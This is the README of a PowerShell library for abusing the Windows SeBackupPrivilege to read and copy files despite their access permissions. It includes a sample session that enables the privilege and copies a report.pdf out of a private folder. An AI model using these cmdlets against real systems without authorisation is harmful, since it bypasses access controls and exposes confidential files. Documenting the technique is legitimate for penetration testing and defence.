On Windows, if a user has the "Back up files and directories" right, he gets assigned the SE_BACKUP_NAME
/SeBackupPrivilege
privilege. Such privilege is disabled by default but when switched on it allows the user to access directories/files that he doesn't own or doesn't have permission to. In MSDN's own words:
This user right determines which users can bypass file and directory, registry, and other persistent object permissions for the purposes of backing up the system.
In order to exploit SeBackupPrivilege
you have to:
- Enable the privilege.
This alone lets you traverse (cd
into) any1 directory, local or remote, and list (dir
,Get-ChildItem
) its contents. - If you want to read/copy data out of a "normally forbidden" folder, you have to act as a backup software.
The shell
copy
command won't work; you'll need to open the source file manually usingCreateFile
making sure to specify theFILE_FLAG_BACKUP_SEMANTICS
flag.
This library exposes three PowerShell CmdLets that do just that.
PS C:\scripts> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\scripts> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS C:\scripts> Get-SeBackupPrivilege # ...or whoami /priv | findstr Backup
SeBackupPrivilege is disabled
PS C:\scripts> dir E:\V_BASE
Get-ChildItem : Access to the path 'E:\V_BASE' is denied.
At line:1 char:4
+ dir <<<< E:\V_BASE
+ CategoryInfo : PermissionDenied: (E:\V_BASE:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
PS C:\scripts> Set-SeBackupPrivilege
PS C:\scripts> Get-SeBackupPrivilege
SeBackupPrivilege is enabled
PS C:\scripts> dir E:\V_BASE # ...having enabled the privilege, this now works
Directory: E:\V_BASE
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 18/07/2013 13:04 Private
PS C:\scripts> cd E:\V_BASE\Private
PS E:\V_BASE\Private> dir
Directory: E:\V_BASE\Private
Mode LastWriteTime Length Name
---- ------------- ------ ----
----- 05/07/2013 12:29 306435 report.pdf
PS E:\V_BASE\Private> Copy-FileSeBackupPrivilege .\report.pdf c:\temp\x.pdf -Overwrite
Copied 306435 bytes
PS E:\V_BASE\Private>
The following dlls are compiled for x64, .NET Framework 2.0 . If they don't match your environment, you'll have to build your own; just import the project into SharpDevelop and you should be good to go.
These resources have been extremely helpful when putting this stuff together:
- Stack Overflow: How to detect if "Debug Programs" Windows privilege is set?
- Stack Overflow: Setting size of TOKEN_PRIVILEGES.LUID_AND_ATTRIBUTES array returned by GetTokenInformation
- Adjusting Token Privileges in PowerShell
- PInvoke.net
[1] Explicit denies should still block you, though...